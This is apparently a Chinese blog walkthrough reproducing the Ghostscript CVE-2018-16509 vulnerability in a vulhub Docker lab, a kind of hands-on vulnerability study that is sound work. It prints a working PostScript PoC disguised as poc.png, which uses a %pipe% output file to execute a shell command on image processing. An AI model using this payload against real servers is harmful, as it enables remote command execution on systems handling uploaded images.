本文详细介绍了在Ubuntu20.04环境下,如何在腾讯云轻量服务器上利用vulhub中的CVE-2018-16509漏洞进行文件上传和测试的过程,包括docker-compose的使用和Poc的下载与执行。
环境说明:
使用腾讯云轻量服务器安装vulhub
系统:ubuntu20.04
1、进入vulhub/ghostscript/CVE-2018-16509目录,使用命令启动漏洞环境:
docker-compose up -d
由于我是使用普通用户开启进入的CVE-2018-16509,所以需要使用:
sudo docker-compose up -d
done表示环境已开启 。
2、使用docker-compose ps 查看漏洞存在的端口:
可以看到相关端口是8080。
3、通过访问your-ip:port可以看到有文件上传的路径:
4、下载poc:
访问poc地址:https://github.com/vulhub/vulhub/blob/master/ghostscript/CVE-2018-16509/poc.png以下载poc.png,poc.png内容为:
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%touch /tmp/CVE-2018-16509_is_success) currentdevice putdeviceprops
5、上传poc.png,点击提交可以看到id等:
6、通过docker-compose exec web bash进入容器 ls /tmp/看到success文件已经创建:
7、也可以通过命令:
sudo docker run -it --rm --name im -v `pwd`/poc.png:/poc.png vulhub/imagemagick:7.0.8-10 convert /poc.png /poc.gif
来测试该漏洞:
5308
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
